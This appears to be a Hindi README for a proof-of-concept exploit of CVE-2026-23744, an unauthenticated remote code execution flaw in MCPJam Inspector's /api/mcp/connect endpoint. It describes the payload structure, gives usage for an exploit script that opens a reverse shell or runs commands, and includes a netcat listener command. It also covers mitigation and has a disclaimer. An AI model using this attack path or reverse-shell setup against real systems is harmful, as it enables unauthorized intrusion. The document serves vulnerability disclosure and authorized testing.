
CVE-2026-23744 के लिए प्रमाण-अवधारणा एक्सप्लॉइट, MCPJam Inspector में एक अप्रमाणित RCE। एक कमजोर API एंडपॉइंट के माध्यम से रिवर्स शेल और कमांड निष्पादन प्रदान करता है।
CVE-2026-23744 एक गंभीर अप्रमाणित रिमोट कोड निष्पादन (RCE) भेद्यता है जो MCPJam Inspector ≤ 1.4.2 को प्रभावित करती है। यह समस्या इसलिए उत्पन्न होती है क्योंकि Inspector एक प्रबंधन एंडपॉइंट (/api/mcp/connect) को उजागर करता है जो उपयोगकर्ता-नियंत्रित MCP सर्वर कॉन्फ़िगरेशन स्वीकार करता है और पर्याप्त प्रमाणीकरण या सुरक्षा प्रतिबंधों के बिना प्रक्रिया निष्पादन को ट्रिगर कर सकता है। प्रभावित संस्करण डिफ़ॉल्ट रूप से localhost के बजाय 0.0.0.0 (सभी इंटरफेस) पर सुनते हैं, जिससे यदि सेवा नेटवर्क-सुलभ है तो दूरस्थ शोषण संभव हो जाता है।
यह भेद्यता निम्नलिखित एंडपॉइंट से जुड़ी है:
POST /api/mcp/connect
एंडपॉइंट एक JSON ऑब्जेक्ट स्वीकार करता है जिसमें सर्वर कॉन्फ़िगरेशन होता है, जैसे:
{
"serverConfig": {
"command": "<executable>",
"args": ["<arguments>"],
"env": {}
},
"serverId": "<identifier>"
}
यह आपूर्ति की गई कॉन्फ़िगरेशन का उपयोग MCPJam Inspector द्वारा एक नया MCP सर्वर प्रक्रिया बनाने और प्रबंधित करने के लिए किया जाता है। चूंकि एंडपॉइंट में पर्याप्त प्रमाणीकरण और सुरक्षा नियंत्रणों का अभाव है, एक हमलावर मनमानी प्रक्रिया परिभाषाएँ प्रस्तुत कर सकता है जो Inspector सेवा द्वारा निष्पादित की जाती हैं।
मूलतः, यह भेद्यता क्रिटिकल फ़ंक्शन के लिए लापता प्रमाणीकरण (CWE-306) का एक मामला है जिसमें एप्लिकेशन विश्वसनीय स्थानीय उपयोगकर्ताओं के लिए इच्छित कार्यक्षमता को उजागर करता है और इसे पर्याप्त सुरक्षा जांच के बिना नेटवर्क पर सुलभ बनाता है।
यह भेद्यता दो डिज़ाइन दोषों से उत्पन्न होती है:
0.0.0.0 पर सुनता है।परिणामी हमला पथ को इस प्रकार देखा जा सकता है:
हमलावर → /api/mcp/connect → प्रक्रिया निर्माण → ऑपरेटिंग सिस्टम
चूंकि एप्लिकेशन सीधे ऑपरेटिंग सिस्टम प्रक्रिया निर्माण के साथ इंटरफ़ेस करता है, सफल शोषण के परिणामस्वरूप MCPJam Inspector सेवा के सुरक्षा संदर्भ में मनमाना कमांड निष्पादन हो सकता है।
python3 exploit.py -t <target_url> -tport <target_port> -lhost <local_ip> -lport <port>
-t (या) --target: लक्ष्य URL या लक्ष्य IP पता।-tport (या) --target-port: कनेक्ट करने के लिए लक्ष्य पोर्ट, अधिकांश मामलों में यह MCPJam Inspector के लिए 6274 है। इस तर्क का उपयोग न करें यदि MCPJam Inspector कहीं और होस्ट किया गया है, जैसे किसी उपडोमेन या वर्चुअल होस्ट में। इसके बजाय उपडोमेन या वर्चुअल होस्ट निर्दिष्ट करने के लिए -t तर्क का उपयोग करें।-lhost (या) --local-host: रिवर्स शेल के वापस कनेक्ट होने के लिए सार्वजनिक IP पता।-lport (या) --local-port: रिवर्स शेल के लिए उपयोग किया जाने वाला पोर्ट।python3 exploit.py -t <target_url> -tport <target_port> -lhost <local_ip> -lport <port> -c '<command>'
-c (या) --command: लक्ष्य पर निष्पादित किया जाने वाला कमांड।इस प्रोग्राम का उपयोग करने से पहले, आपको पहले Netcat का उपयोग करके अपनी स्थानीय मशीन पर एक लिसनर शुरू करना होगा।
ऐसा करने के लिए, निम्नलिखित कमांड का उपयोग करें:
nc -lvnp <port>
फिर, लक्ष्य पर रिवर्स शेल प्राप्त करने के लिए उपरोक्त कमांड चलाएँ।
सफल शोषण एक हमलावर को अनुमति दे सकता है:
इस भेद्यता को CVSS v3.1 स्कोर 9.8 (गंभीर) दिया गया है, इसके नेटवर्क-आधारित हमला वेक्टर, प्रमाणीकरण की कमी, उपयोगकर्ता इंटरैक्शन की अनुपस्थिति, और गोपनीयता, अखंडता और उपलब्धता पर उच्च प्रभाव के कारण।
तुरंत MCPJam Inspector 1.4.3 या बाद के संस्करण में अपग्रेड करें। अतिरिक्त रक्षात्मक उपायों में शामिल हैं:
यह PoC केवल शैक्षिक, रक्षात्मक सुरक्षा अनुसंधान और अधिकृत सुरक्षा परीक्षण के लिए है। इसका उपयोग केवल स्पष्ट अनुमति वाले सिस्टम के विरुद्ध किया जाना चाहिए। तृतीय-पक्ष सिस्टम के विरुद्ध अनधिकृत उपयोग लागू कानूनों और विनियमों का उल्लंघन कर सकता है। इस रिपॉजिटरी का मालिक इस प्रोग्राम के उपयोग से होने वाली किसी भी क्षति के लिए जिम्मेदार नहीं है।